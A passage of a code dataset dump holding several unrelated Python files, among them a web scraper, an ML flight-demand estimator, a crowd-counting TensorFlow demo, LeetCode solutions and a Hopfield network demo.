(np.round(XRC,3))\n\n\n# In[16]:\n\n\ntheta0 = np.zeros(15) # initial guess coverage of CO*, CO2+v*, vac*, O2v*, O*, COO*, CO2* respectively\n\ndegree_of_rate_control(theta0,473,[0.02,0.20])\n\n","sub_path":"Bayesian/MKM.py","file_name":"MKM.py","file_ext":"py","file_size_in_byte":15772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"119720640","text":"# Updates *.jar files after compiling with NetBeans.\r\n# Placed in main folder.\r\n\r\nimport os\r\nimport shutil\r\n\r\njars = ['exttools.jar', 'jpcap.jar', 'mina-core.jar', 'mysql-connector-java-bin.jar', 'slf4j-api.jar', 'slf4j-jdk14.jar', 'XiuzSource.jar']\r\n\r\nfor jar in jars:\r\n\tos.remove('dist/' + jar)\r\n\tif jar == 'xiuzsource.jar':\r\n\t\tshutil.copy('nbdist/xiuzsource.jar', 'dist/' + jar)\r\n\telse:\r\n\t\tshutil.copy('nbdist/lib/' + jar, 'dist/' + jar)\r\n\r\nprint(\"Jars successfully updated!\")","sub_path":"jarUpdater.py","file_name":"jarUpdater.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"499745287","text":"#!/usr/bin/env python\n# coding: utf-8\n\nfrom selenium import webdriver\n\nbrowser = webdriver.Chrome('./chromedriver.exe')\nbrowser.get('https://search.shopping.naver.com/best100v2/detail.nhn?catId=50000006')\n\nhtml = browser.page_source\n\n\nfrom bs4 import BeautifulSoup\nsoup = BeautifulSoup(html,'html.parser')\ncontents = soup.select('li._itemSection')\n\nimport sqlite3\nconnect = sqlite3.connect('../db.sqlite3')\ncursor = connect.cursor()\n\n\nfor content in contents:\n #rank = content.select('div.best_rnk > em')[0] 순위가 1~9까지 잘나오다가 10부터 num1,num0 식으로 되어있음\n #rank = rank.text.strip()\n title = content.select('p.cont')[0]\n title = title.text.strip()\n\n try:\n cursor.execute(\n \"insert into dbapp_navershop(create_date, title) values(datetime('now'), ?)\", [title])\n print(title)\n except:\n pass\n\nconnect.commit()\nconnect.close()\n\nbrowser.close()\nbrowser.quit()\n\n\n\n","sub_path":"scraping/Naver_shopping_top100.py","file_name":"Naver_shopping_top100.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"82352178","text":"import os\nimport numpy as np\nimport pandas as pd\nfrom sklearn.preprocessing import FunctionTransformer\nfrom sklearn.compose import make_column_transformer\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.preprocessing import OrdinalEncoder\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.ensemble import GradientBoostingRegressor\n\n\n\ndef _merge_external_data(X):\n\n\n ########################### Date data ##################################\n\n filepath_one = os.path.join(\n os.path.dirname(__file__), 'external_data.csv'\n )\n\n ####### Make sure that DateOfDeparture is of dtype datetime #######\n\n X = X.copy() # modify a copy of X\n X.rename\n X.loc[:, \"DateOfDeparture\"] = pd.to_datetime(X['DateOfDeparture'])\n # Parse date to also be of dtype datetime\n data=pd.read_csv(filepath_one,index_col=0,parse_dates=[\"Date\"])\n \n ####### Take data for the departure airport #######\n\n X_weather = data[['Date', 'AirPort', 'Max TemperatureC','Events']]\n X_weather = X_weather.rename(\n columns={'Date': 'DateOfDeparture', 'AirPort': 'Departure', 'Max TemperatureC':'temperature_depart','Events':'Events_depart'}\n )\n\n X_merged = pd.merge(\n X, X_weather, how='left', on=['DateOfDeparture', 'Departure'], sort=False\n )\n\n ####### Take data for the arrival airport #######\n\n X_weather = data[['Date', 'AirPort', 'Max TemperatureC','Events']]\n\n X_weather = X_weather.rename(\n columns={'Date': 'DateOfDeparture', 'AirPort': 'Arrival', 'Max TemperatureC':'temperature_arrival', 'Events':'Events_arrival'}\n )\n\n X_merged_meteo = pd.merge(\n X_merged, X_weather, how='left', on=['DateOfDeparture', 'Arrival'], sort=False\n )\n \n \n ########################### airport data ##################################\n\n X = X_merged_meteo.copy() \n\n X_airport = data[['Date','AirPort', 'wage median','beach','passenger per year','population','latitude_deg','longitude_deg','score']]\n X_airport = X_airport.rename(\n columns={'Date': 'DateOfDeparture','AirPort':'Departure', 'wage median':'wage_median_depart', 'beach':'beach_depart', 'passenger per year':'passenger_per_year_depart',\n 'population':'population_depart', 'latitude_deg':'latitude_deg_depart', 'longitude_deg':'longitude_deg_depart','score':'score_depart'}\n )\n\n X_merged_airport = pd.merge(\n X, X_airport, how='left', on='Departure', sort=False\n ).drop(columns=['DateOfDeparture_y']).drop_duplicates().rename(\n columns={'DateOfDeparture_x': 'DateOfDeparture'})\n \n \n\n ####### Take data for the arrival airport #######\n \n \n X = X_merged_airport.copy()\n\n\n X_airport = data[['Date','AirPort', 'wage median','beach','passenger per year','population','latitude_deg','longitude_deg','score']]\n X_airport = X_airport.rename(\n columns={'Date':'DateOfDeparture','AirPort':'Arrival', 'wage median':'wage_median_arrival', 'beach':'beach_arrival', 'passenger per year':'passenger_per_year_arrival',\n 'population':'population_arrival','latitude_deg':'latitude_deg_arrival','longitude_deg':'longitude_deg_arrival','score':'score_arrival'}\n )\n\n X_merged_airport = pd.merge(\n X, X_airport, how='left', on=['DateOfDeparture','Arrival'], sort=False\n )\n \n ######################## stocks fuel holiday data ###################################\n\n X = X_merged_airport.copy()\n\n data_stocks_fuel_holiday = data[['Date', 'AirPort', 'Open','prix','is_holiday']]\n data_stocks_fuel_holiday = data_stocks_fuel_holiday.rename(\n columns={'Date': 'DateOfDeparture','AirPort':'Arrival'})\n X_merged = pd.merge(\n X, data_stocks_fuel_holiday, how='left', on=['DateOfDeparture'], sort=False)\n \n \n ######################## stocks fuel holiday data ###################################\n\n X = X_merged_airport.copy()\n\n data_stocks_fuel_holiday = data[['Date', 'AirPort', 'Open','prix','is_holiday']]\n data_stocks_fuel_holiday = data_stocks_fuel_holiday.rename(\n columns={'Date': 'DateOfDeparture','AirPort':'Arrival'})\n X_merged = pd.merge(\n X, data_stocks_fuel_holiday, how='left', on=['DateOfDeparture','Arrival'], sort=False)\n \n return X_merged\n \ndef _encode_data(X):\n\n ################# encoding the date #########################\n\n # Encode the date information from the DateOfDeparture columns\n X_encoded = X.copy()\n\n # Make sure that DateOfDeparture is of datetime format\n X_encoded.loc[:, 'DateOfDeparture'] = pd.to_datetime(X_encoded['DateOfDeparture'])\n # Encode the DateOfDeparture\n X_encoded.loc[:, 'year'] = X_encoded['DateOfDeparture'].dt.year\n X_encoded.loc[:, 'month'] = X_encoded['DateOfDeparture'].dt.month\n X_encoded.loc[:, 'day'] = X_encoded['DateOfDeparture'].dt.day\n X_encoded.loc[:, 'weekday'] = X_encoded['DateOfDeparture'].dt.weekday\n X_encoded.loc[:, 'week'] = X_encoded['DateOfDeparture'].dt.week\n X_encoded.loc[:, 'n_days'] = X_encoded['DateOfDeparture'].apply(\n lambda date: (date - pd.to_datetime(\"1970-01-01\")).days\n )\n\n \n X_encoded['weekend'] = np.where(X_encoded['weekday'].isin([0,1]),1,0)\n X_encoded['ete'] = np.where(X_encoded['month'].isin([10,5,6]),1,0)\n \n X_encoded['beach_ete_dep'] = X_encoded['ete'] * X_encoded['beach_depart']\n X_encoded['beach_ete_arr'] = X_encoded['ete'] * X_encoded['beach_arrival']\n \n ################# encoding the meteo #########################\n\n # From the meteo data we supply more information\n X_encoded[\"precipitations_depart\"]=X_encoded.apply(lambda x: 0 if pd.isnull(x['Events_depart']) else 1, axis=1)\n X_encoded[\"precipitations_arrival\"]=X_encoded.apply(lambda x: 0 if pd.isnull(x['Events_arrival']) else 1, axis=1)\n X_encoded[\"diff_temp\"]=X_encoded['temperature_depart']-X_encoded['temperature_arrival']\n\n ################# encoding the distance #########################\n\n # calculer la distance entre les deux aeroports\n\n\n # approximate radius of earth in km\n\n def haversine_vectorize(lon1, lat1, lon2, lat2):\n\n lon1, lat1, lon2, lat2 = map(np.radians, [lon1, lat1, lon2, lat2])\n\n newlon = lon2 - lon1\n newlat = lat2 - lat1\n haver_formula = np.sin(newlat/2.0)**2 + np.cos(lat1) * np.cos(lat2) * np.sin(newlon/2.0)**2\n\n dist = 2 * np.arcsin(np.sqrt(haver_formula ))\n km = 6367 * dist #6367 for distance in KM for miles use 3958\n return km\n \n X_encoded[\"distance\"]=haversine_vectorize(X_encoded['longitude_deg_depart'],X_encoded['latitude_deg_depart'],X_encoded['longitude_deg_arrival'],X_encoded['latitude_deg_arrival'])\n\n \n\n ################# ending the encoding #########################\n\n # Finally we can drop the original columns from the dataframe\n \n #print(X_encoded.columns)\n return X_encoded.drop(columns=[\"DateOfDeparture\",\"Events_depart\",\"Events_arrival\",\"latitude_deg_depart\",\n \"latitude_deg_arrival\",\"longitude_deg_arrival\",\"longitude_deg_depart\"])\n \n\n\ndef get_estimator():\n\n # Data augmentation transformer (add a column)\n data_merger = FunctionTransformer(_merge_external_data)\n data_encoder = FunctionTransformer(_encode_data)\n\n # preprocessor for categorical variables\n categorical_encoder = make_pipeline(\n SimpleImputer(strategy=\"constant\", fill_value=\"missing\"),\n OrdinalEncoder()\n )\n categorical_cols = ['Arrival', 'Departure']\n\n preprocessor = make_column_transformer(\n (categorical_encoder, categorical_cols),\n remainder='passthrough', # passthrough numerical columns as they are\n )\n\n # Regressor to do the prediction\n regressor = GradientBoostingRegressor(loss='ls', learning_rate=0.05,n_estimators=1500, subsample=1.0, criterion='friedman_mse',min_samples_split=9, min_samples_leaf=5,min_weight_fraction_leaf=0.0, max_depth=4,min_impurity_decrease=0.0, min_impurity_split=None)\n\n \n\n # Create a pipeline to return a scikit-learn estimator that will\n # be used in ramp-test to do across validation\n \n\n \n return make_pipeline(\n data_merger, data_encoder,\n preprocessor, regressor\n ) ","sub_path":"submissions/Test_1/estimator.py","file_name":"estimator.py","file_ext":"py","file_size_in_byte":8273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"22875132","text":"import requests\ndef PraparedRequestData(lat, lon, roomsnum, storey, storeysnum, buildingtype,\n totalarea, repairraw,\n buildingperiod, windowview, balconiesnum,\n countOfAnalogs):\n data={\n \"lat\":lat,\n \"lon\":lon,\n \"roomsnum\":roomsnum,\n \"storey\":storey,\n \"storeysnum\":storeysnum,\n \"buildingtype\":buildingtype,\n \"totalarea\":totalarea,\n \"repairraw\": repairraw,\n \"buildingperiod\": buildingperiod,\n \"windowview\":windowview,\n \"balconiesnum\":balconiesnum,\n \"countOfAnalogs\":countOfAnalogs\n }\n return data\ndef Test():\n lat = 55.75\n lon = 37.63\n roomsnum = 2\n storey = 1\n storeysnum = 5\n buildingtype = \"кирпич\"\n totalarea = 100\n repairraw = \"стандарт\"\n buildingperiod = 1990\n windowview = \"во двор\"\n balconiesnum = 1\n countOfAnalogs = 5\n data=PraparedRequestData(lat, lon, roomsnum, storey, storeysnum, buildingtype,\n totalarea, repairraw,\n buildingperiod, windowview, balconiesnum,\n countOfAnalogs)\n print(data)\n #server = 'https://api.alina.eliz.site/'\n server='http://127.0.0.1:5000/'\n url = 'real_estate_price_request'\n requestUrl = server + url\n res = requests.post(requestUrl, data=data)\n print(res)\n outputDataDict = res.json()\n for o in outputDataDict:\n print(o, outputDataDict[o])\nif __name__ == '__main__':\n Test()","sub_path":"UserRequest/TestGetPriceRequest.py","file_name":"TestGetPriceRequest.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"205224989","text":"from enum import IntEnum\n\nfrom crownstone_core.util.Conversion import Conversion\nfrom crownstone_core.util.BufferReader import BufferReader\n\n\nclass BehaviourTimeType(IntEnum):\n afterMidnight = 0\n afterSunrise = 1\n afterSunset = 2\n\n @classmethod\n def has_value(cls, value):\n return any(value == item.value for item in cls)\n\n\n\n\nclass BehaviourTimeContainer:\n def __init__(self, fromTime, untilTime):\n self.fromTime = fromTime\n self.untilTime = untilTime\n\nclass BehaviourTime:\n\n def __init__(self):\n self.timeType = None\n self.offset = 0\n self.valid = True\n\n def fromTime(self, hours, minutes):\n self.timeType = BehaviourTimeType.afterMidnight\n self.offset = 3600 * hours + 60 * minutes\n return self\n\n def fromType(self, timeType, offsetSeconds=0):\n self.timeType = timeType\n self.offset = offsetSeconds\n return self\n\n def fromData(self, data):\n if len(data) != 5:\n self.valid = False\n return self\n\n payload = BufferReader(data)\n\n firstByte = payload.getUInt8()\n if not BehaviourTimeType.has_value(firstByte):\n self.valid = False\n return self\n\n self.timeType = BehaviourTimeType(firstByte)\n self.offset = payload.getInt32()\n self.valid = True\n\n return self\n\n def getPacket(self):\n arr = []\n\n arr.append(self.timeType.value)\n arr += Conversion.int32_to_uint8_array(self.offset)\n\n return arr\n\n def getDictionary(self):\n returnDict = {}\n\n if self.timeType == BehaviourTimeType.afterSunset:\n returnDict[\"type\"] = \"SUNSET\"\n returnDict[\"offsetMinutes\"] = self.offset / 60\n elif self.timeType == BehaviourTimeType.afterSunrise:\n returnDict[\"type\"] = \"SUNRISE\"\n returnDict[\"offsetMinutes\"] = self.offset / 60\n else:\n returnDict[\"type\"] = \"CLOCK\"\n returnDict[\"data\"] = {\"hours\": (self.offset - self.offset % 3600) / 3600,\n \"minutes\": (self.offset % 3600) / 60}\n\n return returnDict\n\n","sub_path":"vendor/crownstone_core/packets/behaviour/TimeDescription.py","file_name":"TimeDescription.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"537625095","text":"# Scrapy settings for imgur project\n#\n# For simplicity, this file contains only the most important settings by\n# default. All the other settings are documented here:\n#\n# http://doc.scrapy.org/topics/settings.html\n#\n\nBOT_NAME = 'imgur'\nBOT_VERSION = '1.0'\n\nSPIDER_MODULES = ['imgur.spiders']\nNEWSPIDER_MODULE = 'imgur.spiders'\nUSER_AGENT = '%s/%s' % (BOT_NAME, BOT_VERSION)\n\nITEM_PIPELINES = {'imgur.pipelines.ImgurPipeline': 1} #Custom pipeline for putting imgur title in filename\nIMAGES_STORE = '/home/garwah/imgur' #Directory where scraped images are stored \n\n","sub_path":"imgur/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"2976336","text":"def consecutive_in(B,A):\n return B in (A[i:i+len(B)] for i in range(len(A))) \n \ndef got_path(stack, wrapper):\n if wrapper[0]!=True:\n wrapper[0]=consecutive_in(wrapper[1],stack)\n\ndef inOrder(head, root, stack, wrapper):\n if root:\n stack.append(root.val)\n if wrapper[0]!=True:\n inOrder(head, root.left, stack,wrapper)\n if root.left==None and root.right==None and wrapper[0]!=True:\n got_path(stack, wrapper)\n if wrapper[0]!=True:\n inOrder(head, root.right, stack,wrapper)\n stack.pop()\n\ndef get_node(head):\n l=[]\n t=head\n while t!=None:\n l.append(t.val)\n t=t.next\n return l\n \nclass Solution(object):\n def isSubPath(self, head, root):\n \"\"\"\n :type head: ListNode\n :type root: TreeNode\n :rtype: bool\n \"\"\"\n is_matched = False\n all_node = get_node(head)\n wrapper = [is_matched,all_node]\n stack = []\n inOrder(head, root, stack, wrapper)\n return wrapper[0]","sub_path":"LeetCode/linked_list_in_bst.py","file_name":"linked_list_in_bst.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"421460227","text":"# Time Complexity : O(n)\n# Space Complexity : O(1)\n# Did this code successfully run on Leetcode : Yes\n# Any problem you faced while coding this : No\n\n\n# Your code here along with comments explaining your approach \n\nclass Solution(object):\n def findDisappearedNumbers(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n res = []\n for num in nums:\n index = abs(num) - 1\n if nums[index] > 0:\n nums[index] *= -1\n \n for i in range(len(nums)):\n if nums[i] > 0:\n res.append(i+1)\n \n return res\n ","sub_path":"DisappearedNumber-448.py","file_name":"DisappearedNumber-448.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"54028504","text":"#-*- coding:utf-8 -*-\n\nfrom __future__ import division\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nimport sys\nimport os\nimport argparse\nimport tensorflow as tf\nfrom tensorflow.python.platform import gfile\n\nimport cv2\nimport time\nimport numpy as np\nfrom tqdm import tqdm\nfrom matplotlib import pyplot as plt\nfrom matplotlib import cm as CM\n\nsys.path.append(os.path.join(os.path.dirname(__file__),'../configs'))\nfrom config import cfg\n\ndef parms():\n parser = argparse.ArgumentParser(description='CSRnet demo')\n parser.add_argument('--save_dir', type=str, default='tmp/',\n help='Directory for detect result')\n parser.add_argument('--modelpath', type=str,\n default='weights/s3fd.pth', help='trained model')\n parser.add_argument('--threshold', default=0.65, type=float,\n help='Final confidence threshold')\n parser.add_argument('--ctx', default=True, type=bool,\n help='gpu run')\n parser.add_argument('--img_dir', type=str, default='tmp/',\n help='Directory for images')\n parser.add_argument('--file_in', type=str, default='tmp.txt',\n help='image namesf')\n return parser.parse_args()\n\n\nclass HeadCount(object):\n def __init__(self,args):\n self.loadtfmodel(args.modelpath)\n self.threshold = args.threshold\n self.img_dir = args.img_dir\n self.real_num = 0\n\n\n def loadtfmodel(self,mpath):\n tf_config = tf.ConfigProto()\n #gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.7)\n #tf_config.gpu_options = gpu_options\n tf_config.gpu_options.allow_growth=True \n tf_config.log_device_placement=False\n self.sess = tf.Session(config=tf_config)\n # self.sess = tf.Session()\n modefile = gfile.FastGFile(mpath, 'rb')\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(modefile.read())\n self.sess.graph.as_default()\n tf.import_graph_def(graph_def, name='csr_graph') \n # tf.train.write_graph(graph_def, './', 'breathtest.pbtxt', as_text=True)\n # print(\"************begin to print graph*******************\")\n # op = self.sess.graph.get_operations()\n # for m in op:\n # # if 'input' in m.name or 'output' in m.name or 'confidence' in m.name:\n # print(m.name)#m.values())\n # print(\"********************end***************\")\n self.input_image = self.sess.graph.get_tensor_by_name('csr_graph/input_1:0') #img_input\n self.net_out = self.sess.graph.get_tensor_by_name('csr_graph/output:0') #softmax_output\n\n def display_hotmap(self,img,hotmaps):\n '''\n hotmaps: a list of hot map ,every shape is [1,h,w]\n ''' \n pred_map = hotmaps\n # pred_map = np.transpose(pred_map,(1,2,0))\n # pred_map = pred_map/np.max(pred_map+1e-20) \n pred_num = str(int(np.sum(hotmaps[0])))\n txt = \"real_num:%s - pred_num:%s\" % (str(self.real_num),pred_num)\n fig, axes = plt.subplots(nrows=1, ncols=2, constrained_layout=True)\n ax1 = axes[0]\n ax1.imshow(img[:,:,::-1])\n ax1.set_title(txt)\n ax2 = axes[1]\n ax2.imshow(pred_map,'jet') #cmap=CM.jet)\n plt.savefig('test_density_2.png')\n # plt.title(txt)\n plt.show()\n # pred_frame = plt.gca()\n # plt.imshow(pred_map, 'jet')\n # pred_frame.axes.get_yaxis().set_visible(False)\n # pred_frame.axes.get_xaxis().set_visible(False)\n # pred_frame.spines['top'].set_visible(False) \n # pred_frame.spines['bottom'].set_visible(False) \n # pred_frame.spines['left'].set_visible(False) \n # pred_frame.spines['right'].set_visible(False) \n # plt.savefig(exp_name+'/'+filename_no_ext+'_pred_'+str(float(pred))+'.png',\\\n # bbox_inches='tight',pad_inches=0,dpi=150)\n plt.close()\n def apply_density(self,img,hotmap):\n # create a blank img\n h,w,_ = img.shape\n ih,iw = hotmap.shape[:2]\n # img = cv2.resize(img,(iw,ih))\n overlay = img.copy()\n pred_num = str(int(np.sum(hotmap)))\n point = (int(w-300),20)\n keep_indx = np.where(hotmap>0.0001)\n alpha = 0.5\n cv2.rectangle(overlay, (0, 0), (img.shape[1], img.shape[0]), (255, 0, 0), -1) \n for i in range(len(keep_indx[0])):\n # iy = np.clip(keep_indx[0][i]/float(ih) * h,0,h-1)\n # ix = np.clip(keep_indx[1][i]/float(iw) * w,0,w-1)\n ix = keep_indx[1][i]\n iy = keep_indx[0][i]\n cv2.circle(overlay,(int(ix),int(iy)),3,(0,0,255))\n # image = cv2.addWeighted(overlay, alpha, image, 1-alpha, 0) \n image = cv2.addWeighted(overlay, alpha, img, 1-alpha, 0) \n txt = \"real_num:%s - pred_num:%s\" % (str(self.real_num),pred_num)\n cv2.putText(image,txt,point,cv2.FONT_HERSHEY_COMPLEX,0.5,(0,255,0),1)\n return image\n \n def propress(self,img):\n # rgb_mean = np.array([123.,117.,104.])[np.newaxis, np.newaxis,:].astype('float32')\n # rgb_mean = np.array([0.485, 0.456, 0.406])[np.newaxis, np.newaxis,:].astype('float32')\n # rgb_std = np.array([0.229, 0.224, 0.225])[np.newaxis, np.newaxis,:].astype('float32')\n rgb_mean = np.array([0.5, 0.5, 0.5])[np.newaxis, np.newaxis,:].astype('float32')\n rgb_std = np.array([0.225, 0.225, 0.225])[np.newaxis, np.newaxis,:].astype('float32')\n # img = cv2.resize(img,(1920,1080))\n h,w = img.shape[:2]\n gth = int(np.ceil(h/8.0)*8)\n gtw = int(np.ceil(w/8.0)*8)\n img = cv2.resize(img,(gtw,gth))\n img = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\n img = img.astype('float32')\n img /= 255.0\n img -= rgb_mean\n img /= rgb_std\n img = np.transpose(img,(2,0,1))\n return img\n\n def get_boxarea(self,img,frame):\n '''\n img: gray img\n '''\n img = img[0][0]\n dencity_map = img.copy()\n imgh,imgw = img.shape[:2]\n frameh,framew = frame.shape[:2]\n # print('min',np.min(img))\n # print('max',np.max(img))\n img = np.where(img >0.0002,255,0)\n img = np.array(img,dtype=np.uint8)\n # cv2.imshow('thresh',img)\n kernelX = cv2.getStructuringElement(cv2.MORPH_RECT, (55,1 ))\n kernelY = cv2.getStructuringElement(cv2.MORPH_RECT, (1, 55))\n img = cv2.dilate(img, kernelX, iterations=2)\n img = cv2.erode(img, kernelX, iterations=4)\n img = cv2.dilate(img, kernelX, iterations=2)\n img = cv2.erode(img, kernelY, iterations=1)\n img = cv2.dilate(img, kernelY, iterations=2)\n img = cv2.medianBlur(img, 3)\n # img = cv2.medianBlur(img, 15)\n # cv2.imshow('dilate&erode', img)\n #输入的三个参数分别为:输入图像、层次类型、轮廓逼近方法\n #返回的三个返回值分别为:修改后的图像、图轮廓、层次\n # image, contours, hier = cv2.findContours(img, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n contours, _ = cv2.findContours(img, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n boxes = []\n hull = []\n for i ,c in enumerate(contours):\n # 边界框\n x, y, w, h = cv2.boundingRect(c)\n hull.append(cv2.convexHull(c, False))\n if min(w,h) > 100:\n x2 = int((x+w)/float(imgw) * framew)\n y2 = int((y+h)/float(imgh) * frameh)\n x1 = int(x/imgw *framew)\n y1 = int(y/imgh *frameh)\n # tmp = int(np.sum(dencity_map[x1:x2+1,y1:y2+1]))\n cv2.rectangle(frame, (x1, y1), (x2, y2), (255, 0, 0), 2)\n # cv2.putText(frame,str(tmp),(x1,y1),cv2.FONT_HERSHEY_COMPLEX,0.5,(0,255,0),1)\n boxes.append([x1,y1,x2,y2])\n # cv2.drawContours(frame, hull, i, (0, 255, 0), 1, 8)\n cv2.polylines(frame, [hull[i]], True, (0, 255, 0), 2)\n return frame,boxes\n\n def inference_img(self,imgorg):\n t1 = time.time()\n img = self.propress(imgorg.copy())\n img = np.expand_dims(img,0)\n output = self.sess.run([self.net_out],feed_dict={self.input_image:img})\n # print(\"***out shape:\",np.shape(output))\n cnt_num = np.sum(output[0])\n t2 = time.time()\n print('consuming:',t2-t1)\n img_out = self.apply_density(imgorg,output[0][0])\n # self.display_hotmap(imgorg.copy(),output[0][0])\n img_density,boxes = self.get_boxarea(output,imgorg)\n return img_density ,boxes\n\n def get_num(self,img):\n t1 = time.time()\n img = self.propress(img)\n img = np.expand_dims(img,0)\n output = self.sess.run([self.net_out],feed_dict={self.input_image:img})\n cnt_num = np.sum(output[0])\n return cnt_num\n\n def headcnts(self,imgpath):\n if os.path.isdir(imgpath):\n cnts = os.listdir(imgpath)\n for tmp in cnts:\n tmppath = os.path.join(imgpath,tmp.strip())\n img = cv2.imread(tmppath)\n if img is None:\n continue\n frame,cnt_head = self.inference_img(img)\n print('heads >> ',cnt_head)\n cv2.imshow('result',frame)\n #savepath = os.path.join(self.save_dir,save_name)\n # cv2.imwrite('test.jpg',frame)\n cv2.waitKey(0) \n elif os.path.isfile(imgpath) and imgpath.endswith('txt'):\n # if not os.path.exists(self.save_dir):\n # os.makedirs(self.save_dir)\n f_r = open(imgpath,'r')\n file_cnts = f_r.readlines()\n for j in tqdm(range(len(file_cnts))):\n tmp_file = file_cnts[j].strip()\n tmp_file_s = tmp_file.split('\\t')\n if len(tmp_file_s)>0:\n tmp_file = tmp_file_s[0]\n self.real_num = int(tmp_file_s[1])\n if not tmp_file.endswith('jpg'):\n tmp_file = tmp_file +'.jpg'\n # tmp_path = os.path.join(self.img_dir,tmp_file) \n tmp_path = tmp_file\n if not os.path.exists(tmp_path):\n print(tmp_path)\n continue\n img = cv2.imread(tmp_path) \n if img is None:\n print('None',tmp)\n continue\n frame,cnt_head = self.inference_img(img)\n cv2.imshow('result',frame)\n #savepath = os.path.join(self.save_dir,save_name)\n #cv2.imwrite('test.jpg',frame)\n cv2.waitKey(0) \n elif os.path.isfile(imgpath) and imgpath.endswith(('.mp4','.avi')) :\n cap = cv2.VideoCapture(imgpath)\n frame_width = cap.get(cv2.CAP_PROP_FRAME_WIDTH)\n frame_height = cap.get(cv2.CAP_PROP_FRAME_HEIGHT)\n # print(frame_width, frame_height)\n imgw = int(frame_width)\n imgh = int(frame_height)\n fourcc = cv2.VideoWriter_fourcc('M', 'J', 'P', 'G') #cv2.VideoWriter_fourcc(*\"mp4v\")\n # out = cv2.VideoWriter('test.mp4', fourcc, 25,(frame_width, frame_height))\n out = cv2.VideoWriter('test.avi', cv2.VideoWriter_fourcc('I','4','2','0'), 25, (imgw, imgh))\n if not cap.isOpened():\n print(\"failed open camera\")\n return 0\n else: \n frame_cnt = 0\n boxes = []\n while cap.isOpened():\n _,frame = cap.read()\n frame_cnt +=1\n if frame_cnt % 10 ==0:\n frame,boxes = self.inference_img(frame)\n if len(boxes)> 0:\n for tmp in boxes:\n cv2.rectangle(frame, (tmp[0], tmp[1]), (tmp[2], tmp[3]), (255, 0, 0), 2)\n out.write(frame)\n cv2.imshow('result',frame)\n q=cv2.waitKey(10) & 0xFF\n # cv2.imwrite('test_video1.jpg',frame)\n if q == 27 or q ==ord('q'):\n break\n cap.release()\n cv2.destroyAllWindows()\n elif os.path.isfile(imgpath):\n img = cv2.imread(imgpath)\n # img = cv2.resize(img,(1920,1080))\n if img is not None:\n # grab next frame\n # update FPS counter\n frame,boxes = self.inference_img(img)\n # hotmaps = self.get_hotmaps(odm_maps)\n # self.display_hotmap(hotmaps)\n # keybindings for display\n if len(boxes)> 0:\n for tmp in boxes:\n img_crop = img[tmp[1]:tmp[3]+1,tmp[0]:tmp[2]+1,:]\n tmp_cnt = self.get_num(img_crop)\n cv2.putText(frame,str(tmp_cnt),(tmp[0],tmp[1]),cv2.FONT_HERSHEY_COMPLEX,0.5,(0,255,0),1)\n cv2.imshow('result',frame)\n cv2.imwrite('newm1.jpg',frame)\n key = cv2.waitKey(0) \n else:\n print('please input the right img-path')\n\nif __name__ == '__main__':\n args = parms()\n detector = HeadCount(args)\n imgpath = args.file_in\n detector.headcnts(imgpath)","sub_path":"src/test/demo_tf.py","file_name":"demo_tf.py","file_ext":"py","file_size_in_byte":13307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"263353174","text":"\nimport numpy as np\nimport pandas as pd\n\n\ndef create_neurons(pict):\n names = [(x,y) for x in range(5) for y in range(5)]\n neurons = pd.Series([-1]*len(names), index=names, name='Activation')\n for y, line in enumerate(pict):\n for x in range(len(line)):\n if line[x] != ' ':\n neurons[(x,y)] = 1\n else:\n neurons[(x,y)] = -1\n return neurons\n\ndef show(neurons):\n for y in range(5):\n for x in range(5):\n if neurons[(x, y)] == 1:\n print('#',end='')\n else:\n print(' ',end='')\n print('')\n\ndef learn_character(neurons, links):\n pairs = [(f,t) for f in links.index for t in links.columns if f != t]\n for (f,t) in pairs:\n if neurons[f] == neurons[t]:\n links.ix[f, t] += 1\n else:\n links.ix[f, t] -= 1\n\n\ndef run_hopfield(neurons, links):\n for index, value in links.iterrows():\n a = (value * neurons).sum()\n if a >= 0:\n neurons[index] = 1\n else:\n neurons[index] = -1\n\n\nd = create_neurons([\n '#### ',\n '# #',\n '# #',\n '# #',\n '#### '\n ])\nj = create_neurons([\n '#####',\n ' # ',\n ' # ',\n '# # ',\n ' ## '\n ])\nc = create_neurons([\n ' ####',\n '# ',\n '# ',\n '# ',\n ' ####'\n ])\nm = create_neurons([\n '# #',\n '## ##',\n '# # #',\n '# #',\n '# #'\n ])\n\nshow(d)\nprint(d)\nprint('')\nshow(j)\nprint('')\nshow(c)\nprint('')\nshow(m)\nprint('')\n\nnames = [(x,y) for x in range(5) for y in range(5)]\nlinks = pd.DataFrame(np.zeros(shape=(25, 25)), index=names, columns=names)\nlinks.index.name = 'input'\nlinks.columns.name = 'output'\n\n\nprint(d)\nprint(links)\nlearn_character(d, links)\nprint(links)\nlearn_character(j, links)\nprint(links)\nlearn_character(c, links)\nprint(links)\nlearn_character(m, 